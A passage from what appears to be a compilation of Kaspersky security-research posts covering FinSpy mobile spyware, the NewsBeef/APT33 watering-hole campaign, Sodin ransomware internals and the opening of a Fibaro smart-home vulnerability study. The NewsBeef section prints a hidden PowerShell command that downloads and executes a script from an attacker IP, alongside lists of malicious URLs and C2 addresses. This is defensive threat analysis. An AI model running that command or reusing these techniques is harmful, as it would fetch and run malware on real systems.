  • Threema (ch.threema.iapp / ch.threema.iapp.ThreemaShareExtension);
  • InMessage (com.futurebits.instamessage.free);
  • BlackBerry Messenger (com.blackberry.bbm1);
  • Signal (org.whispersystems.signal).

The collected data is submitted to the local server deployed by the main module.

The “keys” module focuses on a different kind of keylogging activity, with multiple hooks that intercept every typed symbol. There are several hooks to intercept the typed unlock password as well as during the change password process. The intercepted password is submitted to the “keys.html” page on the local server, similar to the “.chext” module.

The module “MediaEnhancer” is designed to hook system functions in the “mediaserverd” daemon related to call processing, in order to record calls. The module starts a local HTTP server instance on port 8889 upon initialization, implementing VoIPHTTPConnection as a custom connection class. This class contains a handler for requests to localhost/voip.html that could be made by other components.

The module “.vpext” implements more than 50 hooks used for VoIP calls processed by external messaging apps including:

  • WhatsApp;
  • LINE;
  • Skype (that includes independent Skype for iPad version);
  • Viber;
  • WeChat;
  • KakaoTalk;
  • BlackBerry Messenger;
  • Signal.

These hooks modify functions that process VoIP calls in order to record them. To achieve this, they send a post request with the call’s meta information to the HTTP server previously deployed by the MediaEnhancer component that starts recording.

Android

The Android implant has similar functionality to the iOS version, but it is also capable of gaining root privileges on an unrooted device by abusing the DirtyCow exploit, which is contained in the malware. FinSpy Android samples have been known for a few years now. Based on the certificate data of the last version found, the sample was deployed in June 2018.

The Android implant’s functionality is unlikely to change much, based on the fact that most of the configuration parameters are the same in the old and new versions. The variety of available settings makes it possible to tailor the behavior of the implant for every victim. For example, operators can choose the preferred communication channels or automatically disable data transfers while the victim is in roaming mode. All the configuration data for an infected Android device (including the location of the control server) is embedded in the implant and used afterwards, but some of the parameters can be changed remotely by the operator. The configuration data is stored in compressed format, split into a set of files in the assets directory of the implant apk. After extracting all pieces of data and building the configuration file, it’s possible to get all the configuration values. Each value in the configuration file is stored after the little-endian value of its size, and the setting type is stored as a hash.

For example, the following interesting settings found in the configuration file of the developer build of the implant can be marked: mobile target ID, proxy ip-address, proxy port, phone number for remote SMS control, unique identifier of the installed implant.

As in the case of the iOS implant, the Android version can be installed manually if the attacker has physical access to the device, and by remote infection vectors: SMS messages, emails and WAP Push. After successful installation, the implant tries to gain root privileges by checking for the presence of known rooting modules SuperSU and Magisk and running them. If no utilities are present, the implant decrypts and executes the DirtyCow exploit, which is located inside the malware; and if it successfully manages to get root access, the implant registers a custom SELinux policy to get full access to the device and maintain root access. If it used SuperSU, the implant modifies SuperSU preferences in order to silence it, disables its expiry and configures it to autorun during boot. It also deletes all possible logs including SuperSU logs.

The implant provides access to information such as contacts, SMS/MMS messages, calendars, GPS location, pictures, files in memory and phone call recordings. All the exfiltrated data is transferred to the attacker via SMS messages or via the internet (the C2 server location is stored in the configuration file). Personal data, including contacts, messages, audios and videos, can be exfiltrated from most popular messengers. Each of the targeted messengers has its own unified handling module, which makes it easy to add new handlers if needed.

The full hardcoded list of supported messengers is shown below:

Package name Application name com.bbm BBM (BlackBerry Messenger) com.facebook.orca Facebook Messenger com.futurebits.instamesssage.free InstaMessage jp.naver.line.android Line Messenger org.thoughtcrime.securesms Signal com.skype.raider Skype org.telegram.messenger Telegram ch.threema.app Threema com.viber.voip Viber com.whatsapp WhatsApp

At first, the implant checks that the targeted messenger is installed on the device (using a hardcoded package name) and that root access is granted. After that, the messenger database is prepared for data exfiltration. If necessary, it can be decrypted with the private key stored in its private directory, and any required information can be simply queried:

All media files and information about the user are exfiltrated as well.

Infrastructure

FinSpy implants are controlled by the FinSpy Agent (operator terminal). By default, all implants are connected to FinSpy anonymizing proxies (also referred to as FinSpy Relays) provided by Gamma Group. This is done to hide the real location of the FinSpy Master. As soon as the infected target system appears online, it sends a heartbeat to the FinSpy Proxy. The FinSpy Proxy forwards connections between targets and a master server. The FinSpy Master server manages all targets and agents and stores the data. Based on decrypted configuration files, our experts were able to find the different relays used by the victims and their geographical location. Most of the relays we found are concentrated in Europe, with some in South East Asia and the USA.

Conclusion

FinSpy mobile implants are advanced malicious spy tools with diverse functionality. Various configuration capabilities provided by Gamma Group in their product enable the FinSpy terminal (FinSpy Agent) operators to tailor the behavior of each implant for a particular victim and effectively conduct surveillance, exfiltrating sensitive data such as GPS location, contacts, calls and other data from various instant messengers and the device itself.

The Android implant has functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. As for the iOS version, it seems that Gamma´s solution doesn’t provide infection exploits for its customers, as their product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. That might imply physical access to the victim in cases where devices are not already jailbroken. At the same time, multiple features that we haven’t observed before in malware designed for this platform are implemented.

Since the leak in 2014, Gamma Group has recreated significant parts of its implants, extended supported functionality (for example, the list of supported instant messengers has been significantly expanded) and at the same time improved encryption and obfuscation (making it harder to analyze and detect implants), which made it possible to retain its position in the market.

Overall, during the research, up-to-date versions of these implants used in the wild were detected in almost 20 countries. However, assuming the size of Gamma’s customer base, it’s likely that the real number of victims is much higher.

A full set of IOCs, including YARA rules, is available to customers of the Kaspersky Intelligence Reporting service. For more information, contact intelreports@kaspersky.com

2019. július 4.

‘Twas the night before

Recently, the United States Cyber Command (USCYBERCOM Malware Alert @CNMF_VirusAlert) highlighted several VirusTotal uploads of theirs – and the executable objects relating to 2016 – 2017 NewsBeef/APT33 activity are interesting for a variety of reasons. Before continuing, it’s important to restate yet again that we defend customers, and research malware and intrusions, regardless of their source. Accordingly, subscribers to our private APT intelligence reports receive unique and extraordinary data on the significant activity and campaigns of over 100 APTs from all over the world, including this 2016-2017 NewsBeef /APT33 activity.

USCYBERCOM’s VirusTotal executable object uploads appeared in our January 2017 private report “NewsBeef Delivers Christmas Presence”, an examination of a change in the tactics used in spear-phishing and watering hole attacks against Saudi Arabian targets. Two files uploaded by USCYBERCOM are of particular interest. These were first seen Dec 2016 and Jan 2017:

MD5: d87663ce6a9fc0e8bc8180937b3566b9, served as
jquerycode-download[.]live/flashplayer23pp_xa_install.exe
jquerycode-download[.]live/chrome_update.exe
Detected as BSS:Exploit.Win32.Generic, Trojan-Downloader.Win32.Powdr.a, Trojan-Downloader.MSIL.Steamilik.zzo

MD5: 9b1a06590b091d300781d8fbee180e75, served as
jquerycode-download[.]live/citrixreceiver.exe
jquerycode-download[.]live/citrixcertificate.exe
ntg-sa[.]com/downloads/citrix_certificate.exe
Detected as BSS:Exploit.Win32.Generic, Trojan-Downloader.PowerShell.Agent.ah, DangerousObject.Multi.Generic

In order to share insight into Cyber Command’s highlighted malware and its context, some of our private report’s content will be re-written here. The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016. All of them cover a thread of mid-2015 activity continuing into 2016, then resetting and advancing in 2016 and into 2017. Bear in mind that regardless of current leaks, which do not always present exhaustive information on group participants, activity from the region has had multiple overlaps and presents a confusion of internal dynamics…

NewsBeef Delivers Christmas Presence

Examination of a change in tactics used in spearphishing and watering hole attacks against Saudi Arabian targets

Executive summary

The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities.

In previous campaigns, NewsBeef relied heavily on its namesake technology, the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that includes macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails, links sent over social media/standalone private messaging applications, and watering hole attacks that leverage compromised high-profile websites (some belonging to the SA government). The group changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command and control C2 infrastructure. 

In a nutshell:

  • The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets;
  • BeEF does not appear to be deployed as a part of the current campaign;
  • Compromised government and infrastructure-related websites are injected with JavaScript that geolocates and redirects visitors to spoofed, attacker-controlled web-servers;
  • Improvements in JavaScript injection and obfuscation may extend server persistence;
  • NewsBeef continues to deploy malicious macro-enabled Office documents, poisoned legitimate Flash and Chrome installers, PowerSploit, and Pupy tools
Technical Analysis

The NewsBeef campaign is divided into two main attack vectors, spearphishing and strategic web compromise (watering hole) attacks. The group’s spearphishing component uses malicious, macroenabled, Microsoft Office documents that deliver PowerShell scripts. The scripts download poisoned installers (e.g. Flash, Citrix Client, and Chrome) from an online presence (in at least one case, the group spoofed a legitimate, well-known IT services organization). Once the installer is downloaded to a victim machine, it runs PowerSploit scripts that in turn download and execute a full-featured Pupy backdoor.

On December 25, 2016, the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations. The group sent these documents (or links to them) to targets via email, and over social network and standalone messaging clients.

To compromise websites and servers, the group identified vulnerable sites and injected obfuscated JavaScript that redirected visitors to NewsBeef-controlled hosts (which tracked victims and served malicious content). These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to their targets.

Targets, social engineering, delivery chain

The majority of NewsBeef targets that our researchers have observed are located in SA. Targeting profiles include:

  • Government financial and administrative organizations
  • Government health organizations
  • Engineering and technical organizations
  • One British labor related government organization (targeted multiple times)

The bulk of the targets were affected through strategic web compromises, especially via compromised government servers. However, Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client “outlook.live.com” as well as attachments arriving through the Outlook desktop application. This behavior falls in line with previous NewsBeef operations, where the group used other standalone messaging clients to send malicious links. Interestingly, NewsBeef set up its server using the hosting provider “Choopa, LLC, US”, the same hosting provider that the group used in attacks over the summer of 2016.

The domain “ntg-sa[.]com” appears to be an attempt by the NewsBeef actor to spoof the legitimate Saudi IT services organization, “National Technology Group” (NTG) at, “ntg.com[.]sa”. The malicious documents served at the spoofed website are shown below:

NTG is a legitimate company that provides IT services and support to SA government organizations and communications firms (as well as international financial groups and retailers), making it a high-value identity. Spoofing the identity of an IT service provider is a particularly important asset to threat actors that can abuse the inherent trust of IT organizations to push software (which may appear suspicious if served from another source). NTG’s IT focus and client list likely aided NewsBeef’s delivery of malicious PowerShell-enabled Office documents and poisoned installers.

In December 2016, the following active URLs were served from the spoofed NTG identity. All of the poisoned installers are technologies that an IT support service may be expected to deliver.

hxxps://ntg-sa[.]com/Downloads/flashplayer23pp_xa_install.exe
hxxps://ntg-sa[.]com/Downloads/Citrix_Certificate.exe
hxxps://ntg-sa[.]com/Downloads/Chrome_Update.exe

In this scenario, the poisoned Flashplayer, Citrix, or Chrome installer drops the file “install.bat”. The batch file runs the PowerShell command:

powershell.exe -w hidden -noni -nop -c “iex(New-Object
System.Net.WebClient).DownloadString(‘http://139.59.46[.]154:3485/eiloShaegae1′)

The command downloads “eiloShaegae1”, another PowerShell downloader script. This second PowerShell downloader script downloads and runs the payload; a PowerSploit ReflectivePEInjection script, “hxxp://139.59.46[.]154:3485/IMo8oosieVai”.

The script maintains and then decodes a base64 string. This base64 string, is the Pupy backdoor DLL, which is loaded and run in-memory, never touching the disk. This Pupy backdoor immediately communicates with 139.59.46[.1]54 over obfs3, posting collected system data and retrieving commands.

This selection of “The Threebfuscator” for command and control (C2) communications is interesting, because it is an obfuscating protocol used to mask Tor communications. It is possible that the use of obfs3 indicates the attackers’ understanding of its effectiveness against outbound connection monitoring.

Another notable spoofed domain used during this campaign is the “maps-modon[.]club” domain. The domain “maps.modon.gov[.]sa” was compromised in December 2016, and the “maps-modon[.]club” domain created on December 8, 2016. The domain shared the same IP address (45.76.32[.]252) as “ntg-sa[.]com”. Although we did not observe any malicious documents retrieved from that domain, it is likely that the domain served the same documents as ntg-sa[.]com. The filenames of the malicious Office documents (hosted at the spoofed NTG site) are relevant to typical IT and contracting resources and indicate that this scheme relies on effective social engineering tactics related to human resources and IT activities.

In other schemes, the attackers sent macro-enabled Office attachments from spoofed law firm identities (or other relevant service providers) to targets in SA. The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign. Below is a screenshot of a fake legal proposal in Word doc format, containing malicious macros and PowerShell code.

The malicious document follows the same chain as the poisoned Flash player or Chrome Installer:

Compromised servers and injected JavaScript

Starting in October 2016, NewsBeef compromised a set of legitimate servers (shown below), and injected JavaScript to redirect visitors to hxxp://analytics-google[.]org:69/Check.aspx:

The entire list of compromised servers is exclusively Saudi Arabian, and includes organizations from the following industries:

  • Energy services for industrial processes
  • Telecom engineering and implementation services
  • Shipping and logistics
  • Metal engineering and manufacturing
  • Information technology services
  • Cement and building materials

These recent attacks against legitimate servers (when compared to previous NewsBeef activity) indicate that NewsBeef operators have improved their technical skills, specifically their ability to covertly inject JavaScript code into served web pages. Their injection and obfuscation techniques enable the actor to serve the same JavaScript with every page visit to the “watering hole” site as well as increase the difficulty of identifying the malicious JavaScript source on compromised sites.

For example, on a Saudi government website, the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site (the packed and unpacked JavaScript is shown below). The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser, browser version, country of origin, and IP address data to the attacker controlled server “jquerycodedownload[.]live/check.aspx”.

It is likely that this collection of visitor information represents an attempt to limit the number of infections to a specific target subset and reduce the attacker’s operational footprint. Although we did not identify injected JavaScript related to the “analytics-google[.]org/check.aspx” redirections, it is likely that it performed similar data collection and exfiltration (via POST). This technique appears to be an improvement over the simple .JPG beaconing which researchers observed in previous NewsBeef watering hole attacks. Packed JavaScript:

The most trafficked of the compromised sites (which redirect to “jquerycode-download[.]live”) appears to be the government site at “scsb.gov[.]sa/portal/”. A high volume of redirections from the compromised site continues into mid-January 2017.

Below is a list of compromised websites and the associated URL that serves the injected, second layer JavaScript. Note that the JavaScript resource changes on every compromised website among many other referenced JavaScript sources, making it difficult to track down the source of the malicious script per site:

www.taqa.com[.]sa/Scroll-jquery.js

199099.gov[.]sa/_LAYOUTS/Yesser.NCC/js/jquery-1.7.2.min.js

Multiple other relevant sites were compromised and redirecting as well. The Pupy backdoor

Pupy is an open source, multi-platform (Windows, Linux, OSX, Android), multi-function backdoor. The backdoor is mainly written in Python and uses code from other open source attack tools like PowerSploit, Mimikatz, laZagne, etc. Pupy can generate backconnect or bindport payloads in multiple formats: PE executables (x86/x64) for Windows, ELF binary/.so for Linux, reflective DLLs (x86/x64), pure Python files, PowerShell, apk, and Rubber Ducky script (Windows).

The malicious DLL deployed by NewsBeef contains Python code, a Python interpreter, and the MSVC runtime library as well as code that loads the Python interpreter, runs Python code and exports some functions for Python. A configuration string contains base64-encoded Python code (packed with zlib) with transport configuration and information about C2 server addresses.

When initiated, the Python code attempts to retrieve and use SOCKS/HTTP proxy settings from the victim’s computer. The Python code then tries to initiate a reverse connection to the C2 server (139.59.46[.]154:3543) using a TCP protocol with RSA+AES traffic encryption and obfs3 transport using default keys from Pupy sources.

After a successful connection, NewsBeef Pupy sends information about the infected computer and waits for commands (which take the form of modules) from the C2 server. The C2 server can send modules with Python code and compiled Python C extensions. The main functionality of the backdoor is implemented in packages (Python code, compiled Python C extensions, compiled executable files) and modules (Python code). Modules can directly access Python objects on the remote client using the RPyC module. The Python modules win32com, win32api, and ctypes are used to interact with the Win32 API. Attackers can use standard modules or write their own. All modules are executed in the memory (a Pupy process can migrate between processes using the corresponding module).

Conclusion

Previous reports on the NewsBeef APT noted the group’s reliance on open-source tools to launch simple, yet effective attacks. Historically, the group has used BeEF to track targets and deliver malicious payloads. However, as this recent campaign indicates, the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents, PowerSploit, and Pupy. Despite this shift in toolset, the group still relies on old infrastructure as evidenced by their reuse of servers hosted by the service providers Choopa and Atlantic.net.

The improvements in tactics, techniques and procedures appears to have paid off. The most recent campaign indicates that the group was able to compromise a larger number of sites including valuable, high-profile SA government identities. However, despite these improvements in technology, the NewsBeef APT continues to rely on social engineering schemes and open-source tools – attributes that increase the chances of identification.

NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue. Additionally, researchers expect that as the group evolves, its tasking will expand to other organizations doing business with, or connected to Saudi Arabian organizations and individuals.

Due to the group’s specific target set, it is crucial that SA security teams, administrators, and developers (especially web application administrators/developers) update their WordPress, Joomla, and Drupal-based web applications and plugins – as these assets are actively scanned and exploited by this APT.

Appendix Related Object MD5 (executable code, malicious office documents, javascript, powershell, etc)
  • f4d18316e367a80e1005f38445421b1f
  • 638b74a712a7e45efc9bec126b0f2d87
  • 45b0e5a457222455384713905f886bd4
  • 19cea065aa033f5bcfa94a583ae59c08
  • ecfc0275c7a73a9c7775130ebca45b74
  • 1b5e33e5a244d2d67d7a09c4ccf16e56
  • fa72c068361c05da65bf2117db76aaa8
  • 43fad2d62bc23ffdc6d301571135222c
  • ce25f1597836c28cf415394fb350ae93
  • 03ea9457bf71d51d8109e737158be888
  • edfc37461fa66716b53333fd7f841a8e
  • 623e05dd58d86da76fdfcf9b57032168
  • 6946836f2feb98d6e8021af6259a02dd
  • f4d18316e367a80e1005f38445421b1f
  • d87663ce6a9fc0e8bc8180937b3566b9
  • f9adf73bf1cdd7cd278e5137d966ddd4
  • b8373f909fa228c2b6e7d69f065f30fb
  • 9b1a06590b091d300781d8fbee180e75
  • bcafe408567557289003c79f745f7713
  • 45b0e5a457222455384713905f886bd4
  • 83be35956e5d409306a81e88a1dc89fd
  • c2165155fcba5b737ee70354b5244be3
  • 444c93e736194a01bf3b319e3963d746
  • 0ed61b6f1008000c6dfcd3d842b21971
  • 3fb33a2747b39a9b1c5c1e41fade595e
  • b34fd14105be23480c44cfdf6eb26807
URLs

Hosting malicious docs, executables, PowerShell and Pupy backdoors

  • moh.com-ho[.]me/Health_insurance_plan.doc
  • moh.com-ho[.]me/Health_insurance_registration.doc
  • mol.com-ho[.]me/cv_itworx.doc
  • mci.com-ho[.]me/cv_mci.doc
  • jquerycode-download[.]live/flashplayer23pp_xa_install.exe
  • jquerycode-download[.]live/citrixcertificate.exe
  • jquerycode-download[.]live/chrome_update.exe
  • jquerycode-download[.]live/CitrixReceiver.exe
  • jquerycode-download[.]live/check.aspx
  • jquerycode-download[.]live/CheckLog.aspx
  • https://ntg-sa[.]com/downloads/citrix_certificate.exe
  • https://ntg-sa[.]com/Downloads/flashplayer23pp_xa_install.exe
  • https://ntg-sa[.]com/Downloads/Chrome_Update.exe
  • http://ntg-sa[.]com/cv.doc
  • http://ntg-sa[.]com/cv_itworx.doc
  • http://ntg-sa[.]com/cv_mci.doc
  • http://ntg-sa[.]com/discount_voucher_codes.xlsm
  • http://ntg-sa[.]com/Health_insurance_plan.doc
  • http://ntg-sa[.]com/Health_insurance_registration.doc
  • http://ntg-sa[.]com/job_titles.doc
  • http://ntg-sa[.]com/job_titles_itworx.doc
  • http://ntg-sa[.]com/job_titles_mci.doc
  • http://ntg-sa[.]com/Password_Policy.xlsm
  • 45.32.186.33
  • http://itworx.com-ho[.]me/*
  • http://mci.com-ho[.]me/*
  • http://moh.com-ho[.]me/*
  • http://mol.com-ho[.]me/*
  • http://ntg-sa[.]com/*
  • taqa.com[.]sa/arabic/resumes/resume.doc
  • taqa.com[.]sa/arabic/resumes/resume.doc
  • taqa.com[.]sa/arabic/resumes/cv-taqa.doc
  • taqa.com[.]sa/arabic/images/certificate.crt.exe
  • taqa.com[.]sa/arabic/tempdn/cv-taqa.doc
  • 104.218.120[.]128/pro.bat
  • 104.218.120[.]128/msservice-a-2.exe
  • 104.218.120[.]128/msservice-a-4.exe
  • 104.218.120[.]128/check.aspx
  • 104.218.120[.]128:69/checkFile.aspx
  • 139.59.46[.]154/IMo8oosieVai
  • 139.59.46[.]154:3485/eiloShaegae1
  • 69.87.223[.]26/IMo8oosieVai
  • 69.87.223[.]26:8080/eiloShaegae1
  • 69.87.223[.]26:8080/p

Additional C2

  • analytics-google[.]org:69/check.aspx
  • analytics-google[.]org/checkFile.aspx
  • jquerycode-download[.]live/check.aspx
  • jquerycode-download[.]live/checkFile.aspx
  • go-microstf[.]com/checkFile.aspx
  • 104.218.120[.]128/check.aspx
  • 104.218.120[.]128:69/checkFile.aspx
2019. július 3.

Sodin ransomware exploits Windows vulnerability and processor architecture

When Sodin (also known as Sodinokibi and REvil) appeared in the first half of 2019, it immediately caught our attention for distributing itself through an Oracle Weblogic vulnerability and carrying out attacks on MSP providers. In a detailed analysis, we discovered that it also exploits the CVE-2018-8453 vulnerability to elevate privileges in Windows (rare among ransomware), and uses legitimate processor functions to circumvent security solutions.

According to our statistics, most victims were located in the Asia-Pacific region: Taiwan, Hong Kong, and South Korea.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographic spread of Sodin ransomware, April – June 2019

Technical description Vulnerability exploitation

To escalate privileges, Trojan-Ransom.Win32.Sodin uses a vulnerability in win32k.sys; attempts to exploit it were first detected by our proactive technologies (Automatic Exploit Prevention, AEP) in August last year. The vulnerability was assigned the number CVE-2018-8453. After the exploit is executed, the Trojan acquires the highest level of privileges.

Information about the process token after exploit execution

Exploit snippet for checking the window class

Depending on the processor architecture, one of two shellcode options contained in the Trojan body is run:

Procedure for selecting the appropriate shellcode option

Since the binary being analyzed is a 32-bit executable file, we are interested in how it manages to execute 64-bit code in its address space. The screenshot shows a shellcode snippet for executing 64-bit processor instructions:

Shellcode consisting of 32-bit and 64-bit instructions

In a 64-bit OS, the segment selector for 32-bit user mode code is 0x23, while the 64-bit segment selector is 0x33. This is confirmed by looking at the Global Descriptor Table (GDT) in the kernel debugger:

Part of the GDT in OS Windows 10 x64

The selector 0x23 points to the fourth segment descriptor (0x23 >> 3), and the selector 0x33 to the sixth (the null descriptor is not used). The Nl flag indicates that the segment uses 32-bit addressing, while the Lo flag specifies 64-bit. It is important that the base addresses of these segments are equal. At the time of shellcode execution, the selector 0x23 is located in the segment register cs, since the code is executed in a 32-bit address space. With this in mind, let’s take a look at the listing of the very start of the shellcode:

Saving the full address 0x23:0xC

After executing the command for RVA addresses 6 and 7, the long return address is stored at the top of the stack in the format selector:offset, and takes the form 0x23:0x0C. In the stack at offset 0x11, a DWORD is placed whose low-order word contains the selector 0x33 and whose high-order word encodes the instruction retf, the opcode of which is equal to 0xCB.

Saving the full address 0x33:0x1B to 64-bit code

Switching to 64-bit mode

The next instruction call (at the address RVA 0x16) performs a near intrasegment jump to this retf instruction (RVA 0x14), having sent the short return address (offset 0x1b) to the stack. As such, at the time of execution of the retf instruction, the top of the stack contains the address in the format selector:offset, where the selector equals 0x33 and the offset is 0x1b. After executing the retf command, the processor proceeds to execute the code at this address, but now in 64-bit mode.

64-bit shellcode

The return to 32-bit mode is performed at the very end of the shellcode.

Returning to 32-bit mode

The retf command makes a far intrasegment jump to the address 0x23:0x0C (it was placed in the instruction stack at the very start of the shellcode, at the RVA address 6-7). This technique of executing 64-bit code in a 32-bit process address space is called Heaven’s Gate, and was first described around ten years ago.

Trojan configuration

Stored in encrypted form in the body of each Sodin sample is a configuration block containing the settings and data required for the Trojan to work.

Decrypted Trojan configuration block

The Sodin configuration has the following fields:

Field Purpose pk distributor public key pid probably distributor id sub probably campaign id dbg debug build fast fast encryption mode (maximum 0x100000 bytes) wipe deletion of certain files and overwriting of their content with random bytes wfld names of directories in which the Trojan deletes files wht names of directories and files, and list of extensions not to be encrypted prc names of processes to be terminated dmn server addresses for sending statistics net sending infection statistics nbody ransom note template nname ransom note file name template exp use of exploit for privilege escalation img text for desktop wallpaper Cryptographic scheme

Sodin uses a hybrid scheme to encrypt victim files. The file contents are encrypted with the Salsa20 symmetric stream algorithm, and the keys for it with an elliptic curve asymmetric algorithm. Let’s take a closer look at the scheme.

Since some data is stored in the registry, this article uses the names given by the ransomware itself. For entities not in the registry, we use invented names.

Data saved by the Trojan in the registry

Key generation

The Sodin configuration block contains the pk field, which is saved in the registry under the name sub_key – this is the 32-byte public key of the Trojan distributor. The key is a point on the Curve25519 elliptic curve.

When launched, the Trojan generates a new pair of elliptic curve session keys; the public key of this pair is saved in the registry under the name pk_key, while the private key is encrypted using the ECIES algorithm with the sub_key key and stored in the registry under the name sk_key. The ECIES implementation in this case includes the Curve25519 elliptic curve, the SHA3-256 cryptographic hash, and the AES-256 block cipher in CFB mode. Other ECIES implementations have been encountered in Trojans before, for example, in SynAck targeted ransomware.

Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. We will call it the public skeleton key. The encryption result is stored in the registry under the name 0_key. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back.

Snippet of the procedure that generates key data and stores some of it in the registry

File encryption

During encryption of each file, a new pair of elliptic curve asymmetric keys is generated, which we will call file_pub and file_priv. Next, SHA3-256(ECDH(file_priv, pk_key)) is calculated, and the result is used as the symmetric key for encrypting file contents with the Salsa20 algorithm. The following information is also saved in the encrypted file:

Data stored in each encrypted file

In addition to the fields discussed above, there is also a nonce (random initialization 8 bytes for the Salsa20 cipher), file_pub_crc32 (checksum for file_pub), flag_fast (if set, only part of the data in the file is encrypted), zero_encr_by_salsa (null dword encrypted by the same Salsa20 key as the file contents – seemingly to check the correctness of the decryption).

The encrypted files receive a new arbitrary extension (the same for each infection case), the ransom note is saved next to them, and the malware-generated wallpaper is set on the desktop.

Cybercriminals demands

Fragment of the desktop wallpaper created by the ransomware

Network communication

If the corresponding flag is set in the configuration block, the Trojan sends information about the infected machine to its servers. The transmitted data is also encrypted with the ECIES algorithm using yet another hardcoded public key.

Part of the Sodin configuration responsible for network communication

Field Purpose ver Trojan version pid probably distributor id sub probably campaign id pk distributor public key uid infection id sk sk_key value (see description above) unm infected system username net machine name grp machine domain/workgroup lng system language bro whether language or layout is from the list (below) os OS version bit architecture dsk information about system drives ext extension of encrypted files

During the execution process, the Trojan checks the system language and available keyboard layouts:

If matches are detected in the list, the malware process terminates short of sending statistics.

MITRE ATT&CK techniques

 

More information about Kaspersky cybersecurity services can be found here: https://www.kaspersky.com/enterprise-security/cybersecurity-services

 

IOC

1ce1ca85bff4517a1ef7e8f9a7c22b16

2019. július 1.

How we hacked our colleague’s smart home

In this article, we publish the results of our study of the Fibaro Home Center smart home. We identified vulnerabilities in Fibaro Home Center 2 and Fibaro Home Center Lite version 4.540, as well as vulnerabilities in the online API.

An offer you cannot refuse

The backbone of any technology company is made up of tech enthusiasts – people who eat, sleep, and breathe it, whose passion for experimenting, including on personal devices, leads them to interesting results. The idea for this study was suggested to us by a colleague of ours, a system administrator in the past and now vice-president of the company. Fibaro Home Center was installed at his home, and he kindly gave us permission to dissect it.

Fibaro is a rather unique company in some ways. It started operating in 2010, when IoT devices were not yet widespread. Today, the situation is different. According to IDC, in just a few years the number of IoT devices will hit almost one billion. Fibaro Group’s plant in Poland already makes about one million different devices a year – from smart sockets, lamps, motion sensors, and flood sensors to devices that directly or indirectly influence the security of homes fitted with them. Moreover, sales of Fibaro devices for 2018 in Russia grew by almost 10 times against 2017. The company clearly plays a significant role in the IoT device market, so a study of Fibaro smart home security is very timely indeed. And when our colleague offered his home as a guinea pig, we could hardly say no.

It is our hope that this article will attract more researchers to the world of IoT, since the growing army of IoT devices requires ever more resources to analyze them. We also hope that the results of our research will catch the eye of companies that produce IoT devices, since errors like the ones we found are best addressed at the code audit and device testing stages.

The challenge we thus faced was to attack the system of someone we knew. On the one hand, this simplified the task, because we did not have to prepare a test bed (the system includes a fairly wide range of different devices). Yet on the other, it complicated it, because the host knew about the impending attack, and had every opportunity to secure his home against the “intruders.”

Potential attack vectors

Before examining the vulnerabilities detected, we will describe our analysis of the attack surface of the Fibaro smart home and consider each of the attack vectors.

Reconnaissance stage

Just like real cybercriminals, we started with a little intelligence and information gathering from open sources.

Smart home equipment is rather expensive, but there is no need to own a specific device to get the required information about it, since Fibaro publishes extensive details of its devices online. The FAQ section on the company’s website provides some interesting facts. For example, Home Center can be managed directly from home.fibaro.com or even via SMS. So clearly, when Internet access is available, the system connects to, and can be controlled through, the cloud.

The website also divulges that Home Center manages Fibaro devices using the Z-Wave protocol. This protocol is often used to automate home processes, as it has greater range than Bluetooth and lower power consumption than Wi-Fi.

Another tidbit is that if the network already has some kind of smart device that does not belong to Fibaro (for example, an IP camera), Fibaro provides various plug-ins to integrate the device into a single complex and manage it from Home Center.

Our colleague greatly simplified our task by providing a static IP address through wLibraryhich we could gain access to the admin panel login form.

Admin panel login form

A scan revealed that only one port accessible from the outside was opened at this IP address and it was forwarded on the router to the Fibaro Home Center admin panel. All other ports were blocked. The presence of an open port goes against Fibaro’s security recommendations (see item 10). However, if our colleague had used a VPN to access Home Center, the lack of any entry points to start analysis would have put an end to our study before it had begun.

Perimeter overview

At the reconnaissance stage, information from open sources (more precisely, from Fibaro’s official website) was sufficient to piece together several attack vectors that could be used against our colleague’s home.

Attack via Z-Wave

This attack can be carried out in the immediate vicinity of the device. The intruders need to reverse-engineer the code of the Z-Wave communication module, for which they need to be within range of a device operating on the Z-Wave protocol. We did not go down this route.

Attack via the admin panel web interface

As is known, the smart home system has an admin panel for device management. This means that there is some kind of backend and data storage on the device in question. Most often, due to the lack of RAM and persistent memory in embedded and IoT devices, the server role is performed by PHP or CGI (which run alongside a lightweight web server), while the file system or file database (for example, SQLite) acts as the storage. Sometimes, the server-side logic is wholly processed by a web server, which takes the form of a compiled binary ELF file. In our case, the software stack consisted of PHP, Lua, nginx, a C++ server, and lighttpd, while data was stored in both an SQLite database and a special section of the file system.

